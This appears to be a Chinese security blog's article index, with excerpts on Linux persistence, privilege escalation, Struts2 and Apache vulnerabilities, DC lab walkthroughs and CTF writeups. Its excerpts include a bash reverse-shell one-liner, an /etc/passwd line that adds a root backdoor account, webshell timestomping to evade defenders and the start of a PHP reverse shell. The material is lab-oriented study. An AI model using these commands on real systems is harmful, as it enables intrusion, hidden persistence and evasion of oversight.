- 博客(50)
- 收藏
- 关注
RSS订阅原创 linux权限维持
接下来将开启linux权限维持的学习:放一张Llinux权限维持镇楼图(图源ShAun’s Blog)修改文件创建时间如果蓝队根据文件修改时间来判断文件是否为后门,如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题。使用touch命令修改时间和属性touch -r index.php shell.php这里就复刻了index.php的属性,创建了一个同属性的shell.php...
2021-11-04 20:12:02
979
原创 数据库提权
拖了很久的MYSQL提权,今天终于有时间写一下了!MYSQL提权之UDF:UDF 全程 ‘user defined function’,‘用户自定义函数’。是通过添加新函数,实现mysql中用户无法通过函数实现功能的拓展具体原理讲不清楚,有点糊涂,网上关于这方面的资料感觉不是很多,先学会利用吧。提权流程概述:我们需要一个root用户权限,最高权限为超级管理员。因为root用户才会具备写入和导入功能,普通低权用户无法执行。如何实现拿到mysql的账号和密码?当我们拿下一个网站的shell的时候,上传
2021-11-04 20:11:35
2438
1
原创 Strust2漏洞汇总
本文所涉及的复现环境均可在vulhub上复现文章目录S2-001:原理:影响版本:复现:S2-003原理:影响版本:POCS2-005原理:影响版本:漏洞复现:S2-007:原理:影响版本:POC:复现:S2-008:原理:影响版本:复现:S2-009原理:影响版本:复现:S2-013:原理:影响版本:复现:S2-015:原理:影响版本:POC:复现:S2-016:(很重要)原理:影响版本:POC:复现:S2-032:原理:影响版本:复现S2-045:原理:影响版本:复现:S2-046:原理:影响版本:复
2021-10-23 09:30:00
2014
原创 Apache中间件漏洞学习
Apache HTTPD 换行解析漏洞(CVE-2017-15715)原理:apache2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略复现:首先这里查看index.php<?phpif(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext = pathinfo($name,PATHINFO_EXTENSI
2021-10-19 22:31:14
3907
1
原创 linux权限维持(部分)
文章目录修改权限:添加账户防御方法:配置SUID:给予权限防御方法:修改权限:添加账户添加普通用户:useradd guest;echo 'guest:123456'|chpasswd添加root用户(前面提权那里有讲)echo "test:advwtv/9yU5yQ:0:0:,,,:/root:/bin/bash" >>/etc/passwd账户:test 密码:password@123添加账户进行权限维持,很简单。防御方法: 查询特权用户特权用户(uid 为0)[
2021-09-12 17:45:14
555
原创 DC7靶机训练
kali:192.168.78.131DC-7:192.168.78.142扫描存活主机和开放端口ifconfignmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.142访问80端口又是这个框架,这个系列遇到很多次了其实再前面我们使用NMAP命令的时候已经对80端口做了域名扫描,这里就不再使用dirseach扫描看到/user/login,访问一下:不行没办法,整个框架被修改过业务,并没有存在像DC8一样的sq
2021-09-08 21:43:35
377
原创 DC-8靶机练习
KALI:192.168.78.131 靶机:192.168.78.141查询存活主机,扫面开放端口:ifconfignmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.140访问80端口:采用的是Durpal框架,该框架在DC-1系列也出现过。那这里先扫描一下域名,再看下服务,最后再MSF查询dirsearch发现一个登录界面访问登陆界面:考虑到爆破 先查询一下MSF该框架有无漏洞都不能使用再次看看开放
2021-09-07 20:09:51
209
1
原创 DC6靶机训练
kali:192.168.78.131DC-6:192.168.78.140ifconfignmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.140访问80端口,查看框架眼熟的WordPress,扫描域名,寻找我们需要的登录框find / -name "dirseach*" 2> /dev/null (查询dirseach模块在哪里python3 dirsearch.py -u url -e php找到我们需
2021-09-06 20:45:05
272
1
原创 DC5靶机训练
kali????:192.168.78.131DC-5:老样子,查看IP段,扫描存活主机及开放端口ifconfignmap -sP 192.168.78.0/24 nmap -p 1-65535 -A -sV 192.168.78.133发现靶机:192.168.78.138开放端口:80 、111访问80端口什么也没有发现,试着扫一下目录都没又什么用,去MSF查询一个Nginx1.6有无漏洞没有可以利用的地方,暂时从80端口没有思绪Emmm后面发现有个留言板,之前没看到留
2021-09-04 18:09:55
138
原创 DC4靶机训练
kali????:192.168.78.131靶机:192.168.68.137信息搜集查询内网机器网段并扫描存活主机ifconfignmap -sP 192.168.78.0/24 扫描存活主机开放端口:nmap -p 1-65535 -A -sV 192.168.78.133发现开放了80端口和SSH端口,后续应该会用到远程登陆访问80端口,上来就是一个登录窗口,不出意外大概率是工具破解还是先扫一下目录没有什么发现那就直接爆破账户和密码推荐使用kali自带的字典hy
2021-08-28 19:31:57
187
原创 DC-3(脏牛提权,但是ZIP已经无法下载)
发现存活主机并扫描开放端口发现存活主机ifconfignmap -sP 192.168.78.0/24 发现存活主机:192.168.78.136扫描开放端口nmap -p 1-65535 -A -sV 192.168.78.136发现80端口开放并尝试访问这里作者说明了此次靶机只有一个FLAG,拿到FLAG需要ROOT权限,提示了我们可以关注系统信息提权...
2021-08-28 14:44:08
361
转载 PHP代码实现反弹shell
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html<?phpfunction which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); }function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
2021-08-28 13:42:02
3849
原创 DC-2(VI GIT提权)
文章目录扫描网段内存活主机及其开放端口FLAG1:访问即可FLAG2:使用工具爆破用户密码FLAG3:SSH登录并绕过rbash限制FLAG4:VI提权FLAG5:GIT提权kali攻击????:192.168.78.131目标主机:192.168.78.xxx环境配置参照DC-1扫描网段内存活主机及其开放端口使用命令查询主机所在网段ifconfig得到网段192.168.78.xxx,扫描该网段内其他存活的主机nmap -sP 192.168.78.0/24 发现192.168.
2021-08-25 23:09:15
902
原创 DC-1 (FIND提权)
文章目录扫描存活主机及其开放端口FLAG1获取:利用MSF拿下入口FLAG2:配置文件泄露信息FLAG3:EXP添加管理员账户FLAG4、5:linux提权之FINDDC涉及到linux提权,前面的信息搜集阶段的操作也是很不错的实践方法,接下来几天将会持续更新完毕DC系列靶机:192.168.78.133kali:192.168.78.131配置:kali和靶机都配置成net模式扫描存活主机及其开放端口首先查看一下kali网卡的ip段:ifconfigkali和靶机在同一网卡里面,
2021-08-24 20:45:51
815
转载 SSH协议详解(转载)
SSH协议详解转发的http://blog.csdn.net/macrossdzh/article/details/5691924很透彻啊,学习了一、什么是SSHSSH是英文Secure Shell的简写形式。通过使用SSH,你可以把所有传输的数据进行加密,这样"中间人"这种攻击方式就不可能实现了,而且也能够防止DNS欺骗和IP欺骗。使用SSH,还有一个额外的好处就是传输的数据是经过压缩的,所以可以加快传输的速度。SSH有很多功能,它既可以代替Telnet,又可以为FTP、Pop、甚至为PPP提供一
2021-08-04 11:43:09
1805
原创 域学习:内网探测存活主机端口、定位域管理工具、判断内网连通性:
ICMP协议探测:平时经常用PING去探测一个主机是否能被探测到或者用于判断机器是否可以出网。这里做个笔记更好了解一下PING和IMCP协议ICMP出现的原因:在IP通信中,经常有数据包到达不了对方的情况。原因是,在通信途中的某处的一个路由器由于不能处理所有的数据包,就将数据包一个一个丢弃了。或者,虽然到达了对方,但是由于搞错了端口号,服务器软件可能不能接受它。这时,在错误发生的现场,为了联络而飞过来的信鸽就是ICMP 报文。在IP 网络上,由于数据包被丢弃等原因,为了控制将必要的信息传递给发信方。I
2021-08-01 10:00:45
1705
原创 域学习:域内信息搜集(暂时不讲工具)
环境配置:win2008 (10.1.1.1) 上线域管理win 2007(10.1.1.3)上线普通域用户(感觉winxp不是很好用,因为有些命令没法执行,但是在07或者其他系列系统中可以执行,因此还是选用07)域内信息搜集查看当前权限whoami:(xp系统无法使用)域管理员:域用户:本地普通用户:域用户可以查询一些域内信息,本地用户无法查看获取域SID什么是SID:安全标识符(Security Identifiers),是标识用户、组和计算机帐户的唯一的号码whoami
2021-07-31 20:08:54
845
原创 域学习:手动收集信息
文章目录环境配置:信息搜集:查询网络配置信息:查询操作系统及软件的信息:查看系统体系结构:查看安装的软件及版本路径等查询本机服务信息:查询进程查看启动程序的信息:查看计划任务查询开机时间:查询用户列表查询成员信息:列出或断开本地计算机与所连接的客户端之间的对话查看本地管理员用户信息:查看当前在线用户:查询端口列表查看系统详细信息,补丁列表、频率等等查询本机共享列表查询路由表及所有可用接口的ARP缓存表查看防火墙配置查看代理配置情况:环境配置:DC:win2008-1 (10.1.1.1) 上线用户:w
2021-07-30 20:49:38
527
原创 1.从零认识 TCP、UDP 协议到完成 DOS脚本攻击
声明:这个系列的文章是很久以前写的了,保存再本地怕丢失了。文章里面有些图片转存失败,我也没有进行更正修改,因为图片实在是太多了。如果有要PDF带图的师傅,可以加我要PDF版本。(Q:1056391561)TCP、UDP协议到完成SYN—flood脚本攻击再到实现简易通讯前言:看了网络上大部分文章,都不是很好理解,因此自己写下这篇文章,帮助后面的学习者更好理解。这里我将用通俗易懂的话语对TCP、UDP、协议漏洞、SYN攻击、简易攻击脚本五个模块做一个阐述TCP/IP:什么是TCP/IP协议TCP/
2021-07-30 14:26:25
1658
原创 8.认识robots.txt到爬取信息
1.robots协议:什么是robots.txt:robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的,在一个搜索引擎要访问这个网站之前,会先访问robots.txt,robots.txt会告诉搜索引擎什么目录不可访问或者哪些目录可以访问。注意:robots协议并不是一个规范,而只是约定俗成的,所以并不能保证网站的隐私。robots.txt协议是任何用户可以查看的,当然,是
2021-07-30 14:14:11
1157
原创 7.正则抓取页面内容
请求方法:因为自己在这一块是有基础得,所以下面简单讲解一下请求方法:GET请求:GET方法: 用于使用给定的URI从给定服务器中检索信息,即从指定资源中请求数据。使用GET方法的请求应该只是检索数据,并且不应对数据产生其他影响。 单纯跳转页面得请求:xazlsrc.com/index.php xazlsrc.com/login.php,即直接在url后面加上要访问得页面名称即可 传值得请求:例如某登录界面:xazlsrc.com/?username=1&passwd=2 说
2021-07-30 14:12:04
905
原创 5.域名爆破到python脚本扫描
DNS域名解析:DNS暴力枚举,第一眼看过去有点懵,后面想了下DNS就是一个解析协议,暴力枚举应该是用我们的字典去跑,去搜集网站的其他域名信息等等。这样一来目的就很明确了:请求+判断是否200+返回域名+解析ip即可,具体怎么实现这个过程,一下就闪现几个python模块:socket、requet、pwn三个库,前两个库主要是访问http协议,对于非http协议无法链接,PWN库主要是CTF比赛的时候会用到.ok思路明确了,那么脚本写起来就很快了什么是DNS域名解析:我们通常访问的都是域名,比如:’‘
2021-07-30 14:11:24
345
原创 4.FTP
FTP协议原理以及两种工作模式:什么是FTP呢?FTP 是 TCP/IP 协议组中的协议之一,是英文File Transfer Protocol的缩写。简单的说,FTP就是完成两台计算机之间的拷贝,从远程计算机拷贝文件至自己的计算机上,称之为“下载 ”文件。若将文件从自己计算机中拷贝至远程计算机上,则称之为“上传(upload)”文件。在TCP/IP协议中,FTP标准命令TCP端口号为21,Port方式数据端口为20。这里提到一个点:FTP标准命令TCP端口号为21,Port方式数据端口为20。后
2021-07-30 14:10:19
219
原创 3.基于TCP、UDP的扫描探测
SYN全端口半扫描:首先需要知道SYN的原理,之前在提到过syn_flood:消耗服务器资源导致服务器运行缓慢严重至瘫痪的攻击方式。认识一下SYN半扫描:在认识之前,我们先知道TCP三次握手:第一次握手:客户端–>服务端:发送SYN (建立通讯的包)第二次握手:服务端–>客户端:发送SYN+ACK第三次握手:客户端–>服务端:发送ACK这里放上图和名次解释,几天不复习,自己又忘了:TCP数据包 头结构:名次解释:●源端口、目的端口:16位长。标识出远端和本地的端口号
2021-07-30 14:09:28
1346
1
原创 2.ICMP+模块探测
IMCP自己在学习IMCP之前,在网上看了很多文章,发现有一篇文章很适合初学者学习,里面整理很全面,虽然没有涉及到后续代码扫描窗口,但是仍然值得学习:这里放上师傅的链接:https://blog.csdn.net/qq_41983709/article/details/102894165因为上面那篇文章讲述很全面,下面我将概述部分主流内容IMCP存在的意义:封装在IP数据报里面,如果传输出现了差错,ICMP就会返回相应的错误类型浅谈IMCP的部分作用:1.ping:方便我们查询判断主机端口
2021-07-30 14:05:35
433
原创 linux提权(部分)
linux提权方式有很多,这里从易到难在自己电脑做个笔记,根据其他师傅的笔记在自己电脑上面复现一下明文密码提取基础知识:etc/passwd 储存了用户,全用户可读,root 可写。etc/shadow 存储密码的 hash,仅 root 可读写。这里我使用的是Centons:查看一下etc/passwd里面存储的用户账号密码信息:passwd 由冒号分割,第一列是用户名,第二列是密码,x 代表密码 hash 被放在 shadow 里面了(这样非 root 就看不到了)。而 shadow 里面
2021-07-29 16:21:37
321
原创 反弹shell学习(一):基础反弹姿势
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结:bash反弹:这是最常见也是最简单的一种反弹shell的方式,直接看命令:攻击机:nc -lvp 2333受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1攻击机:受害机:最后攻击机达成的效果:可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
2021-07-25 15:56:34
2140
2
原创 反弹shell学习
简单讲一下反弹shell:什么是shell?linux的终端就是shell,相当于windows下的cmd.exe反弹shell的原理到底是什么:反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。这里有个地方初学者不是很好理解:目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。那么这句话的实质操作是什么呢?本质就是目标机对攻击机发起了TCP请求,既然有了请求,那么必然有输入和输出。而我们
2021-07-24 16:19:33
568
原创 SSRF小trick
gopher协议构造POST、GET请求从而进行内网访问:gopher协议比WWW协议要早,虽然现在普遍流行WWW协议,但是gopher协议依然是存在的,我们在SSRF中最经典的就是给你一个?url=,一般来说我们后面可以直接跟上127.0.0.1/flag.php即可达到内网访问的效果,但是如果要追踪到view sorce,那么gopher协议就是一个很好的利用方式,其实我个人认为是可以把gopher协议和www理解为一类的,都是可以发送一个POST GET请求给服务器,然后我们自身是可以伪造一些内容。
2021-07-24 10:58:26
164
原创 HTTP请求走私学习
前言:HTTP请求走私一类的问题再CTF中不是特别常见,最近一次遇到还是再HGAME里面,但是还是来学习一下,很多内容都是从其他文章搬运得,主要是自己记录一下,以后查阅起来自己得东西能快速拾起来文章目录漏洞产生原理:简述原理:五种攻击方式:CL不为0(前端允许GET请求携带请求体)CL-CLCL-TETL-CL:TE-TE:没有做过题目,但是看看Playload学习一下:漏洞产生原理:大多数HTTP请求走私漏洞的出现是因为HTTP规范提供了两种不同的方法来指定请求的结束位置:Content-Lengt
2021-07-06 16:03:18
161
原创 eval(cmd)与eval($cmd)
这个问题一直困扰我许久,今天终于解决清楚了问题1:eval的执行是否需要双引号包括:先看三个命令:A:<?php eval(system(dir))?>B:<?php $cmd="system(dir)"; eval($cmd)?>A结果:B结果:报错思考:同样是一个命令,为什么会出现如此区别,询问了其他师傅得知:eval执行的是变量的值的时候,该变量值需要闭合,也就是必须是一个完整的语句,需要用分号结尾。根据这个道原理我们改一下上面的命令看看:<?
2021-07-01 23:20:13
1553
1
原创 修改文件名实现目录跳跃的思考
这个知识点一直都是似懂非懂,今天正式回顾一下:…/是作为状态码被理解还是解析的时候进行了跳转?再linux中使用一下命令:cd tmpmkdir 123mkdir ../321我们会发现在tmp目录下新建了一个123的文件,在tmp的上层目录新建了一个321的文件这里我们猜测是因为文件名中包含了 "…/"这个条约字符串导致的接下来我们直接修改文件名看看会有什么反映:mv命令这里会出现一点分歧:原因: 因为mv又修改文件名和移动文件的意思,而我又修改了文件名且包含…/ ,所以这里应该
2021-06-30 22:03:19
326
2
原创 文件包含中伪协议的利用
文件包含一直没有整理知识,今天就用这篇文章梳理一下解题吧伪协议:首先说一下:./ 与…/的区别:./是:当前目录…/是父级目录fillter、file用来读取文件源码:filter协议用于读取源码居多,读取路径是相对路径,较为轻松。一般拿来读取index.php源码?file=php://filter/read=convert.base64-encode/resource=./flag.php这里说一下,php这里可以大写例如:使用filter读取源码,方便我们下一步说说file协
2021-06-22 19:10:18
1867
原创 ISCC 2021 SSTI
再ISCC中遇到了一道SSTI的题目,拿来练练手,题目难度的化,相对于普遍的过滤来说,这个过滤要更狠一点把。看题:进去之后是这样的,也没有提示传参,但是题目是lovely ssti盲猜who am i 传参点应该是这个表情,这里仕林哥哥直接告诉了表情包叫xiaodouni,我就不去信息搜集了FUZZ测试:测试结果:过滤了:_ ‘’ requests chr . chr 实操过程中还出现了字符串反转思路:过滤 . : 采用 |attr可以绕过过滤单引号: 可以用双引号或
2021-06-21 16:15:14
557
原创 PHP Smarty模版注入
文章目录简介:常用标签:{php}:{literal} 标签调用静态方法(没遇到过 不是很理解这个playload){if}:总结:简介:Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。常用标签:{php}:Smarty支持使用{php}{/php}标签来执行被包裹其中的p
2021-06-21 15:17:13
2118
原创 Apache SSI 远程命令执行漏洞
首先关于Apache SSI命令执行漏洞网上讲解也不多,这个漏洞主要是与配置有关,也很简单使用条件:SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。如果服务端开启了SSI,那么就可以通过上传一个shtml文件(上传内容的是命令执行)从而达到RCE效果用法:ssi的语法格式类似HTML的注释,因此正确启用ssi之后,浏览器可以忽略他但是源码仍然可见,服务器
2021-06-21 14:31:29
190
原创 记 [CISCN 2019 初赛]Love Math三种解法
文章目录思路:解法一:思路二:思路三:总结:只有第一个playload能解出,剩下两个知识思路衍射首先来看源码:<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) {
2021-06-19 20:23:06
558
1
原创 关于PHP二次传参
文章目录问题1:虽然是二次传参传给了cmd,但是为什么可以绕过那么正则表达式呢?问题2:那么为什么在后面,$_GET[shell]又可以进行传参了呢?问题3:既然可以把传入进来的字符串命令执行,那为什么不直接用一个$_GET然后执行所有呢?在很多CTF比赛里面,经常出现如下代码(以下代码也为后面例题源码):$a=$_GET['cmd']; if (preg_match("/system/i", $a)){ echo 'isset flag!!'; die();} eval($a); 先不
2021-06-19 16:31:23
470
原创 2021强网杯 Web赌徒 WP
文章目录源代码:分析__invoke__get_tostringEXP调用流程:总结源代码:<meta charset="utf-8"><?php//hint is in hint.phperror_reporting(1);class Start{ public $name='guest'; public $flag='syst3m("cat 127.0.0.1/etc/hint");'; public function __construc
2021-06-15 13:22:33
530
1
原创 laravel 58 RCE分析(一条链子)
文章目录写在最前面和laravel55 一样的EXP寻找一个新的链子->dispatch:漏洞分析:继续分析:最终EXP:总结:写在最前面之前审计过laravel54 55的框架,这次继续跟着WP审计一下laravel58,这次链子相比于前面两个框架,相比来说更为复杂一点,因此再审计的过程,建议读者不断回溯代码,理解每个参数变量的来源,环境搭建这里不做讲解了,直接进行分析和laravel55 一样的EXP首先依然是寻找_construct方法:这里找的是 :Illuminate\Broadca
2021-06-10 17:55:09
377
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人